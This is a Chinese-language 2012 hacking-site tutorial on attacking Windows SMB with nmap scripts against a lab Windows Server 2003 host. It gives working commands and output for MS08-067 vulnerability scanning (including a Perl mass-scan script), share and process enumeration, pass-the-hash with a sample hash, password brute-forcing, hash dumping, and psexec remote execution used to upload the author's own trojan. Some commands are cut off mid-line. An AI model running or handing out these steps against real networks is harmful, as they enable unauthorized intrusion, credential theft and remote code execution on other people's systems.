热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

针对Windows Smb的攻击方式 10种

发布时间:2012-02-10 09:59文章来源:dis9文章作者:Aoi Sora 点击次数:
摘要:各位渗透手在为中小型企业做安全评估的时候,总会想到SMB,下面来介绍下SMB的各种攻击....


对于各种武术而言,都有一个罩门,一半都是小JJ,小穴穴或者是眼睛,特殊的是腰部,或者是什么的,详细参考神雕大侠什么的。而SMB就是微观的罩门,
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。
 

开始攻击

下面本菜演示一下,老鸟请自觉飞过


1 nmap attack

nmap是一个强大的扫描工具,他还有其他的扫描方法哦

root@Dis9Team:/usr/local/share/nmap/scripts# pwd
/usr/local/share/nmap/scripts
root@Dis9Team:/usr/local/share/nmap/scripts# ls | grep smb
smb-brute.nse
smb-check-vulns.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smbv2-enabled.nse
root@Dis9Team:/usr/local/share/nmap/scripts#

检查漏洞

这里需要用到NMAP的脚本 smb-check-vulns.nse eg :

root@Dis9Team:/# nmap -sU -sS --script smb-check-vulns.nse -p U:137,T: 139 192.168.1.133

Smb的攻击方式

从上面的图片种可以看出139 192.168.1.133存在MS-08-67漏洞
当然了我们也能来批量的

nmap -p445 --script=smb-check-vulns 192.168.0.*|perl -le 'while(<STDIN>){if(/^.*?((d+.d+.d+.d+))$/) { $i = $1;} if(/^|s+(.*?):s+VULNERABLE$/ && $i ne ""){ print "$i is vulnerable to $1"; }}'

192.168.0.5 is vulnerable to MS08-067
192.168.0.11 is vulnerable to MS08-067
192.168.0.24 is vulnerable to MS08-067

如果你嫌弃命令太长你可以用这个perl脚本:

$eth = $ARGV[0];

if($eth eq "") {
print "Usage: smb-check.pl eth< #>n";
exit(0);
}

@ifconfig = `ifconfig $eth`;

foreach $line (@ifconfig) {
if($line =~ /^.*?inets+addr:(d+.d+.d+).d+.*/) {
$range = $1;
}
}

open(NMAP, "nmap -p445 --script=smb-check-vulns $range.*|") || die "$!";
while(<NMAP>) {
if(/^.*?((d+.d+.d+.d+)):$/) {
$i = $1;
}
if(/^|_s+(.*?):s+VULNERABLE$/ && $i ne "") {
print "$i is vulnerable to $1n";
$vuln++;
}
}

if($vuln eq "") {
print "No vulnerable hosts foundn";
exit(0);
}

信息探测

eg :

root@Dis9Team:/# nmap -p445 --script=smb-os-discovery 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 18:55 CST
Nmap scan report for 192.168.1.133
Host is up (0.00051s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-os-discovery:
| OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
| Name: WORKGROUPDIS9TEAM-6ZL2OS
|_ System time: 2012-02-08 18:55:12 UTC+8

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
root@Dis9Team:/#

下面来探测一下他是否有共享

root@Dis9Team:/# nmap -p445 --script=smb-enum-shares 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:00 CST
Nmap scan report for 192.168.1.133
Host is up (0.00065s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-shares:
| 1
| Anonymous access: <none>
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
root@Dis9Team:/#

恩 有共享目录
我们可以继续升入一下:

=123456 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:01 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:01
Scanning 192.168.1.133 [1 port]
Completed ARP Ping Scan at 19:01, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:01
Completed Parallel DNS resolution of 1 host. at 19:01, 0.24s elapsed
Initiating SYN Stealth Scan at 19:01
Scanning 192.168.1.133 [1 port]
Discovered open port 445/tcp on 192.168.1.133
Completed SYN Stealth Scan at 19:01, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.133.
Initiating NSE at 19:01
Completed NSE at 19:01, 0.19s elapsed
Nmap scan report for 192.168.1.133
Host is up (0.00078s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-shares:
| 1
| Type: STYPE_DISKTREE
| Comment: 1
| Users: 0, Max: <unlimited>
| Path: C:WINDOWS
| Anonymous access: <none>
| Current user ('administrator') access: READ
| ADMIN$
| Type: STYPE_DISKTREE_HIDDEN
| Comment: xDCx0BxA1x06
| Users: 0, Max: <unlimited>
| Path: C:WINDOWS
| Anonymous access: <none>
| Current user ('administrator') access: READ/WRITE
| C$
| Type: STYPE_DISKTREE_HIDDEN
| Comment: xD8xA4qxAB
| Users: 0, Max: <unlimited>
| Path: C:
| Anonymous access: <none>
| Current user ('administrator') access: READ/WRITE
| IPC$
| Type: STYPE_IPC_HIDDEN
| Comment: xDCx0B IPC
| Users: 1, Max: <unlimited>
| Path:
| Anonymous access: READ <not a file share>
|_ Current user ('administrator') access: READ <not a file share>

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@Dis9Team:/#

扫描到了很多的信息 如果你在渗透种 只获得HASH,没破解出密码,你也可以用HASH批量扫描哦 亲

root@Dis9Team:/# nmap -v -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbhash=32ed87bdb5fdc5e9cba88547376818d4 192.168.1.133

Smb的攻击方式

读取共享内容:

ass=123456 192.168.1.133

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-08 19:17 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:17
Scanning 192.168.1.133 [1 port]
Completed ARP Ping Scan at 19:17, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:17
Completed Parallel DNS resolution of 1 host. at 19:17, 0.04s elapsed
Initiating SYN Stealth Scan at 19:17
Scanning 192.168.1.133 [1 port]
Discovered open port 445/tcp on 192.168.1.133
Completed SYN Stealth Scan at 19:17, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.133.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.39s elapsed
Nmap scan report for 192.168.1.133
Host is up (0.00056s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F7:A4:E9 (VMware)

Host script results:
| smb-enum-processes:
|
| `+-Idle
| | `-System
| | `-smss
| | `+-csrss
| | `-winlogon
| | `+-services
| | | `+-TPAutoConnSvc
| | | | `-TPAutoConnect
| | | +-dllhost
| | | +-vmacthlp
| | | +-spoolsv
| | | +-msdtc
| | | +-svchost
| | | +-vmtoolsd
| | | `-dfssvc
| | `-lsass
| +-explorer
| | `+-VMwareTray
| | +-ctfmon
| | `-cmd
| | `-conime
|_ `-wmiprvse

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@Dis9Team:/#

暴力破解

nmap能破解嘛? 话说他能WORDPRESS后台都能破解,下次分享给大家
eg :

nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

Smb的攻击方式


从上图种我们可以看出来 你懂的。。。。
 

导出HASH

上面说我们暴力破解到了SMB的一个账户,如果是系统权限,那我们能到处HASH!

root@Dis9Team:/# nmap -p445 --script=smb-pwdump.nes --script-args=smbuser=test,smbpass=test 192.1.1.133

但是在新版本种这个脚本不在了 哦YE~ 悲剧的是我有备份哦~
psexec

psexec大家都熟悉吧? NMAP也能这么做
命令:

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=帐号,smbpass=密码,config=配置 -p445 IP

PSEXEC的默认配置在:/usr/local/share/nmap/nselib/data/psexec
你用的时候要下载

wget http://nmap.org/psexec/nmap_service.exe

到PSEXEC配置目录
下面做个演示:

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=administrator,smbpass=123456,config=network.lua -p445 192.168.1.133

Smb的攻击方式


我用的配置是network.lua ,大家可以自己查看内容
用的配置是network.lua ,大家可以自己查看内容
下面我自己写个lua文件
上传我自己的木马

root@Dis9Team:/# nmap --script smb-psexec.nse --script-args=smbuser=administrator,smbpass=123456,config=test -p445 192.168.1.133

^_^成功了

Smb的攻击方式

参考:root@Dis9Team:/usr/local/share/nmap/nselib/data/psexec# cat pwdump.lua

标签分类: Smb攻击 系统攻击

上一篇:PHP Hashtable collisions 简要分析
下一篇:接触到的几种上传漏洞的利用